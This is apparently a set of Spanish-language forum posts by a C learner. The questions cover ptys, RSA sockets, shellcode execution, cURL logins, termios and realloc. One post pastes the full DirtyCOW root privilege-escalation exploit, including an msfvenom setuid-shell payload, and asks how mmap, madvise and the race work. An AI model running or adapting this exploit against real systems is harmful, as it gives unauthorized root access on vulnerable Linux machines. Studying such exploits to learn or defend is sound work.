Hola.

Estaba trasteando con los pty's y al hacer unos cuantos me he dado cuenta de que no puedo utilizar correctamente NCURSES o moverme por el input del terminal como desearía.
Buscando imitar a SSH he mirado su codigo para ver como lo hace, pero al imitarlo me sale prácticamente lo mismo. Ejemplo del codigo:

#include <stdio.h>
#include <unistd.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <pty.h>
#include <utmp.h>
#include <sys/select.h>
 
int
main(void)
{
  int fdm, fds;
 
  openpty(&fdm, &fds, NULL, NULL, NULL);
 
  if ( fork() == 0 )
    {
      close(fdm);
 
      login_tty(fds);
 
      dup2(fds, 0);
      dup2(fds, 1);
      dup2(fds, 2);
 
      close(fds);
 
      char *arg[] = {NULL};
 
      execvp("/bin/bash", arg);
    }
  else
    {
      fd_set fd;
 
      while ( 1 )
        {
          char put;
 
          FD_ZERO(&fd);
 
          FD_SET(0, &fd);
          FD_SET(fdm, &fd);
 
          select(fdm+1, &fd, NULL, NULL, NULL);
 
          if ( FD_ISSET(0, &fd) )
            {
              read(0, &put, 1);
              write(fdm, &put, 1);
            }
          if ( FD_ISSET(fdm, &fd) )
            {
              read(fdm, &put, 1);
              write(1, &put, 1);
            }
        }
 
      close(fdm);
    }
 
  return 0;
}

Gracias, de antemano.

Tengo los siguientes codigos:

cliente:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <openssl/pem.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/evp.h>
#include <openssl/bio.h>
#include <openssl/err.h>
 
int getipbyhostname ( const char *hostname, char *ip,
                        size_t size, struct in_addr *in ) {
  int fd;
  char *r_host = (char *)hostname;
  struct sockaddr_in *r_addr = NULL;
  struct addrinfo info_addr, *res_addr, *r;
 
  info_addr.ai_family     = AF_INET;
  info_addr.ai_socktype   = SOCK_STREAM;
  info_addr.ai_flags      = AI_PASSIVE;
  info_addr.ai_protocol   = 0;
  info_addr.ai_addr       = NULL;
  info_addr.ai_canonname  = NULL;
  info_addr.ai_next       = NULL;
 
  if ( getaddrinfo ( r_host, NULL, &info_addr, &res_addr ) != 0 )
    return -1;
 
  for ( r = res_addr; r != NULL; r = r->ai_next ) {
    if ( r->ai_family == AF_INET ) {
      if ( (fd = socket ( r->ai_family, r->ai_socktype, r->ai_protocol )) != -1 )
        break;
 
      close ( fd );
    }
  }
 
  r_addr = (struct sockaddr_in *)r->ai_addr;
 
  if ( in != NULL ) {
    memcpy ( (void *)in, (void *)&r_addr->sin_addr, sizeof ( struct in_addr ) );
  } strncpy (ip, inet_ntoa ( r_addr->sin_addr ), size);
 
  freeaddrinfo ( res_addr );
 
  return 0;
}
 
 
int main (int argc, char **argv) {
  if ( argc < 3 ) {
    return fprintf ( stderr, "%s <host> <port>\n", argv[0] );
  }
 
  int port = atoi ( argv[2] );
  int sc, rd, e_size, pub_len = 2048;
  char host_ip[15];
  char *r_host = argv[1];
  char msg[] = "This is a successful test text did in C";
  char encrypt_msg[256];
  char *pub_key = calloc ( pub_len, sizeof ( char ) );
  struct in_addr *inaddr_st = (struct in_addr *)malloc ( sizeof ( struct in_addr ) );
  struct sockaddr_in c_addr;
  RSA *rsa = NULL;
 
  if ( getipbyhostname ( r_host, (char *)&host_ip, sizeof ( host_ip ), inaddr_st ) == -1 ) {
    return fprintf ( stderr, "Error getting host %s\n", argv[1] );
  }
 
  // opening the socket
  if ( (sc = socket ( AF_INET, SOCK_STREAM, 0 )) == -1 ) {
    return fprintf ( stderr, "Error opening socket\n" );
  }
 
  c_addr.sin_family = AF_INET;
  c_addr.sin_port = htons ( port );
  c_addr.sin_addr = *inaddr_st;
//  memcpy ( (void *)&c_addr.sin_addr, (void *)inaddr_st, sizeof ( struct in_addr ) );
 
  printf ("%s\ndd", inet_ntoa ( c_addr.sin_addr ));
 
  if ( connect ( sc, (struct sockaddr *)&c_addr, sizeof ( c_addr ) ) == -1 ) {
    return fprintf ( stderr, "Error connecting to the host\n" );
  }
 
  // receiving the public key
  rd = recv ( sc, pub_key, pub_len, 0 );
 
  // encrypting the message
  d2i_RSAPublicKey ( &rsa, (const unsigned char **)&pub_key, rd );
  if ( rsa == NULL ) {
    return fprintf ( stderr, "Error creating RSA public key\n" );
  }
 
  if ( (e_size = RSA_public_encrypt ( strlen ( msg ), (unsigned char *)msg,
          (unsigned char *)&encrypt_msg, rsa, RSA_PKCS1_PADDING )) == -1 ) {
    return fprintf ( stderr, "Error creating RSA key\n" );
  }
 
  // sending encrypted message
  send ( sc, encrypt_msg, e_size, 0 );
 
  close ( sc );
 
  return 0;
}
 

Servidor:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <openssl/bio.h>
#include <openssl/pem.h>
#include <openssl/x509.h>
#include <openssl/rsa.h>
#include <openssl/bn.h>
 
RSA *RSA_generate ( int bits ) {
  RSA *rsa = RSA_new ();
  BIGNUM *e = BN_new ();
 
  BN_set_word ( e, RSA_F4 );
 
  if ( RSA_generate_key_ex ( rsa, bits, e, NULL ) == -1 )
    return NULL;
 
  BN_clear_free ( e );
 
  return rsa;
}
 
char *getRSAPrivateKey ( RSA *rsa ) {
  int i;
  char *priv_key = NULL;
 
  if ( (i = i2d_RSAPrivateKey ( rsa, (unsigned char **)&priv_key )) == -1 )
    return NULL;
 
  priv_key[i] = '\0';
 
  return priv_key;
}
 
char *getRSAPublicKey ( RSA *rsa ) {
  int i;
  char *pub_key = NULL;
 
  if ( (i = i2d_RSAPublicKey ( rsa, (unsigned char **)&pub_key )) == -1 )
    return NULL;
 
  pub_key[i] = '\0';
 
  return pub_key;
}
 
int createListenSocket ( int port, struct sockaddr_in *s_addr, int size ) {
  int sc;
 
  if ( (sc = socket ( AF_INET, SOCK_STREAM, 0 )) == -1 )
    return -1;
 
  s_addr->sin_family = AF_INET;
  s_addr->sin_port = htons ( port );
  s_addr->sin_addr.s_addr = INADDR_ANY;
 
  if ( bind ( sc, (struct sockaddr *)s_addr, size ) == -1 )
    return -1;
 
  if ( listen ( sc, 1 ) == -1 )
    return -1;
 
  return sc;
}
 
int main () {
  int sc, cc;
  int rd, len;
  char *pub_key = NULL;
  char *priv_key = NULL;
  unsigned char encrypt_data[256];
  unsigned char decrypt_data[2048];
  struct sockaddr_in s_addr, c_addr;
  RSA *rsa = NULL;
 
  // generate rsa 2048
  if ( (rsa = RSA_generate ( 2048 )) == NULL )
    return fprintf ( stderr, "Error creating RSA keys\n" );
 
  // getting public key
  pub_key = getRSAPublicKey ( rsa );
  priv_key = getRSAPrivateKey ( rsa );
 
  if ( pub_key == NULL || priv_key == NULL )
    return fprintf ( stderr, "Error creating public and private key\n" );
 
  // creating listen socket
  sc = createListenSocket ( 33177, &s_addr, sizeof ( s_addr ) );
 
  // waiting client connection
  len = sizeof ( c_addr );
  if ( (cc = accept ( sc, (struct sockaddr *)&c_addr, (socklen_t *)&len )) == -1 )
    return fprintf ( stderr, "Error accept() calling\n" );
 
  // sending public key
  send ( cc, pub_key, 2048, 0 );
 
  // receiving crypt message
  rd = recv ( cc, encrypt_data, sizeof ( encrypt_data ), 0 );
  if ( rd <= 0 )
    return fprintf ( stderr, "Error receiving information\n" );
 
  if ( (len = RSA_private_decrypt ( rd, encrypt_data, decrypt_data, rsa, RSA_PKCS1_PADDING )) == -1 ) {
    return fprintf ( stderr, "Error decrypting message\n" );
  } decrypt_data[len] = '\0';
 
  printf ("%s\n", decrypt_data);
 
  RSA_free ( rsa );
  close ( cc );
  close ( sc );
 
  return 0;
}
 

El problema que tengo principalmente es que no quiero usar la funcion gethostbyname, y me he hecho una propia utilizando getaddrinfo. Lo que hago es intentar establecer una conexion con el servidor, pero nunca funciona. El error está en el connect, creo, pero no encuentro el por qué no conecta.
El localhost sí funciona, pero con una ip remota no.

Gracias de antemano.

Hola.

Estoy intentando ejecutar una shellcode que genero con el programa xxd de esta manera:

Una vez tengo la shell generada en el fichero some.c intento ejecutarlo de esta manera:

Al compilar el programa no da ningún error. Cuando lo ejecuto me da violacion de segmento.

También he probado cargando en memoria el programa de esta manera:

Y me pasa lo mismo xd. ¿Cómo puedo ejecutar codigo en hexadecimal en C? Es decir, lo que viene a ser coger el codigo en lenguaje máquina codificado en hex y ejecutarlo en otro programa en C.

Yo creo que lo que tengo que hacer es cargarlo en memoria y ejecutar esa posicion de memoria, pero no sé qué hago mal en este proceso ni el por qué de la violación de segmento.

Gracias de antemano.

Hola.

Principalmente, mi duda es esa. He leído que con el programa iperf3 se puede obtener y tal, me parece muy bien, pero quiero hacer una función que me devuelva en ancho de banda de un ordenador Linux sin depender de programas. La cuestión es... ¿como puedo medir el ancho de banda?

Esta cuestion viene porque estoy haciendo un cliente de SFTP y me gustaría saber como puedo descargar los ficheros con sockets sin tener que limitarlo a 1024 bytes por segundo u otro numero. Si me ciño al tamaño del fichero, como pueda ser 5MB puede que supere el ancho de banda de la red, o directamente puede que al reservar la memoria para almacenar eso me dé algún error.

Mi duda final, básicamente, es ¿como puedo obtener el ancho de banda de una conexión? Tal y como se ve cuando se ejecuta pacman en ArchLinux a la hora de descargar un paquete y tal. Que indica el ancho de banda.

Gracias de antemano.

Hola. Me he descargado de exploit-db.com el exploit DirtyCOW, y estoy aprendiendo a programar en C y me gustaría entenderlo un poco. Adjunto codigo:

/*
* (un)comment correct payload first (x86 or x64)!
* 
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd is overwritten
* Popping root shell.
* Don't forget to restore /tmp/bak
* thread stopped
* thread stopped
* root@box:/root/cow# id
* uid=0(root) gid=1000(foo) groups=1000(foo)
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>
 
void *map;
int f;
int stop = 0;
struct stat st;
char *name;
pthread_t pth1,pth2,pth3;
 
// change if no permissions to read
//char suid_binary[] = "/usr/bin/passwd";
char suid_binary[] = "mydirty";
 
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/ 
unsigned char sc[] = {
  0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
  0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
  0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
  0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
  0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
  0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
  0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
 
void *madviseThread(void *arg)
{
    int i,c=0;
    for(i=0;i<1000000 && !stop;i++) {
        c+=madvise(map,100,MADV_DONTNEED);
    }
    printf("thread stopped\n");
  return NULL;
}
 
void *procselfmemThread(void *arg)
{
    char *str;
    str=(char*)arg;
    int f=open("/proc/self/mem",O_RDWR);
    int i,c=0;
    for(i=0;i<1000000 && !stop;i++) {
        lseek(f,(off_t)map,SEEK_SET);
        c+=write(f, str, sc_len);
    }
    printf("thread stopped\n");
  return NULL;
}
 
void *waitForWrite(void *arg) {
    char buf[sc_len];
 
    for(;;) {
        FILE *fp = fopen(suid_binary, "rb");
 
        fread(buf, sc_len, 1, fp);
 
        if(memcmp(buf, sc, sc_len) == 0) {
            printf("%s is overwritten\n", suid_binary);
            break;
        }
 
        fclose(fp);
        sleep(1);
    }
 
    stop = 1;
 
    printf("Popping root shell.\n");
    printf("Don't forget to restore /tmp/bak\n");
 
    system(suid_binary);
  return NULL;
}
 
int main(int argc,char *argv[]) {
    char backup[1024];
 
    printf("DirtyCow root privilege escalation\n");
    printf("Backing up %s.. to /tmp/bak\n", suid_binary);
 
    sprintf(backup, "cp %s /tmp/bak", suid_binary);
    system(backup);
 
    f = open(suid_binary,O_RDONLY);
    fstat(f,&st);
 
    printf("Size of binary: %d\n", st.st_size);
 
    char payload[st.st_size];
    memset(payload, 0x90, st.st_size);
    memcpy(payload, sc, sc_len+1);
 
    map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
 
    printf("Racing, this may take a while..\n");
 
    pthread_create(&pth1, NULL, &madviseThread, suid_binary);
    pthread_create(&pth2, NULL, &procselfmemThread, payload);
    pthread_create(&pth3, NULL, &waitForWrite, NULL);
 
    pthread_join(pth3, NULL);
 
    return 0;
}

Por lo que tengo entendido en el codigo, primeramente, se llama a la funcion mmap, la cual copia el contenido del fichero en memoria. Después se llama a la funcion madvise en el thread madviseThread, que no sé lo que hace exactamente xd, y finalmente llama al thread procselfmemThread, que escribe en el contenido del fichero cargado en memoria el payload que hay declarado en 'sc'. Y bueno, la funcion waitForWrite que busca si se ha escrito en el fichero.

Lo que me gustaría saber es, primero, ¿que hace la funcion mmap exactamente?, segundo, ¿que hace la funcion madvise?, tercero, ¿para qué lo meten en un bucle tan grande?, cuarto, si se carga en memoria el fichero, ¿cómo se escribe el fichero cargado en memoria al fichero real almacenado en el disco?, y por último, si en la funcion del thread procselfmemThread en el write escribo "write (f, str, sc_len) == sc_len" ¿no debería de acabar ya que se supone que ha escrito los bytes de sc_len en el fichero objetivo?

Gracias de antemano.

Hola.
Tengo el siguiente codigo:

char getch (void) {
  fflush (stdout);
  char buf;
  struct termios old = {0}, new = {0};
 
  if (tcgetattr (STDIN_FILENO, &old) < 0)
    return -1;
 
  new = old;
 
  new.c_lflag &= ~ICANON;
  new.c_cc[VMIN] = 1;
  new.c_cc[VTIME] = 0;
 
  if (tcsetattr (STDIN_FILENO, TCSANOW, &new) < 0)
    return -1;
 
  if (read (STDIN_FILENO, (char *)&buf, 1) < 0)
    return -1;
 
  if (tcsetattr (STDIN_FILENO, TCSANOW, &old) < 0)
    return -1;
 
  return buf;
}
 
int main () {
  printf ("Introduce un caracter\n");
   int a = getch ();
...
}

No entiendo por qué debo poner fflush despues de haber impreso por pantalla el "Introduce un caracter". Es decir, ¿por qué no lo imprime en primera instancia?

Gracias de antemano.

Perdón por el título tan general que he puesto pero es que no sé cómo expresar lo siguiente.

Tengo la siguiente función:

char *GetJSession (FILE *sf) {
  size_t s = 0;
  char *buf = NULL;
  char *js = (char *) calloc (256, sizeof (char));
  char *str = (char *) js;
 
  while (getline (&buf, &s, sf) > 0) {
    printf ("%s", buf);
    if (strstr (buf, "JSESSIONID=") != NULL) {
      while (*++buf != '=');
      while (*buf != ';') {
        *str = *buf;
        str++, buf++;
        printf ("%c", *str);
      }
    }
  }
...

Lo que quiero saber es por qué es necesario el uso de str y no puedo hacer esto con la variable js directamente. Anteriores veces he intentado hacer lo siguiente:

*js = *buf;
js++, buf++;

Pero no me ha funcionado, sólo me ha funcionado haciendo que str apuntase a js. ¿Puede alguien explicarme esta necesidad?

Gracias de antemano

Hola.

Estoy haciendo un programa que usa cURL para autenticarse en la UA, pero no consigo hacer que envíe los datos por POST. El codigo es el siguiente:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <curl/curl.h>
 
int main (int argc, char **argv) {
  if (argc < 2)
    return fprintf (stderr, "%s <ua mail>\n", argv[0]);
 
  char *user = argv[1];
  char *pass = getpass ("Contraseña de la UA: ");
  CURL *cSession;
  FILE *sf = fopen ("res.html", "at");
  struct curl_httppost *pData = NULL;
  struct curl_httppost *last = NULL;
 
  curl_formadd (&pData, &last,
    CURLFORM_COPYNAME, "username",
    CURLFORM_COPYCONTENTS, argv[1],
    CURLFORM_END);
  curl_formadd (&pData, &last,
    CURLFORM_COPYNAME, "password",
    CURLFORM_COPYCONTENTS, pass,
    CURLFORM_END);
 
  cSession = curl_easy_init ();
  if ( !cSession ) {
    fprintf (stderr, "Error iniciando cURL\n");
  } else {
    curl_easy_setopt (cSession, CURLOPT_VERBOSE, 1);
    curl_easy_setopt (cSession, CURLOPT_URL, "https://autentica.cpd.ua.es/cas/login?service=https://cvnet.cpd.ua.es/uacloud/home/indexVerificado");
    curl_easy_setopt (cSession, CURLOPT_HTTPPOST, pData);
    curl_easy_setopt (cSession, CURLOPT_FOLLOWLOCATION, 1);
    curl_easy_setopt (cSession, CURLOPT_WRITEDATA, (FILE *)sf);
    curl_easy_setopt (cSession, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
 
    if (curl_easy_perform (cSession) != 0) {
      fprintf (stderr, "Error executing cURL session\n");
    } else {
      printf ("Done!\n");
    }
  }
 
  curl_easy_cleanup (cSession);
 
  return 0;
}

Lo que quiero saber es por qué no envía los datos al FORM. También he probado quitando la estructura curl_httppost y añadiendo simplemente curl_easy_setopt (cSession, CURLOPT_POSTFIELDS.

Espero que me puedan ayudar.

Y antes de que algun listillo (y vago) diga: "No hacemos tareas aquí". No, no es una tarea, sino se lo preguntaría al profesor, porque el codigo ya está medio hecho.

Gracias de antemano.

Hola.

Nunca he usado la función realloc, y ahora utilizandola me pregunto algunas cosas:
Cuando utilizo la funcion, el compilador me fuerza un poco a que utilize un valor de retorno. Por ello he hecho el siguiente programa:

int main () {
  int *a, *b = (int *) malloc (sizeof (int));
 
  b[0] = 20;
  a = (int *)realloc (b, 2 * sizeof (int));
  b[1] = 30;
 
  printf ("%p\n%p\n", &a, &b);
 
  return 0;
}

Las dudas que me surgen son... ¿El valor de retorno de realloc apunta a la nueva dirección con los datos que contenía el primer argumento (en este caso a[0] debería ser 20 y tendría que tener espacio para un int más)? ¿Que es lo que ocurre si hago free ( b ); y continuo usando a?

Hola.

Me surge el siguiente error cuando ejecuto un programa:  "error while loading shared libraries libmysqlclient.so.18"
Soy consciente del error, me falta la librería MySQL, pero el caso es... lo que quiero hacer es compilar mi programa y hacer que sea portable. Es decir, lo que quiero es poder compilar el programa para usar la libreria estaticamente en el programa. He probado con el parámetro -static-libgcc al compilar con gcc en Linux, pero ni caso.

Espero que me podáis ayudar. Si no entendéis lo que quiero expresar, educadamente preguntadme.

Gracias de antemano.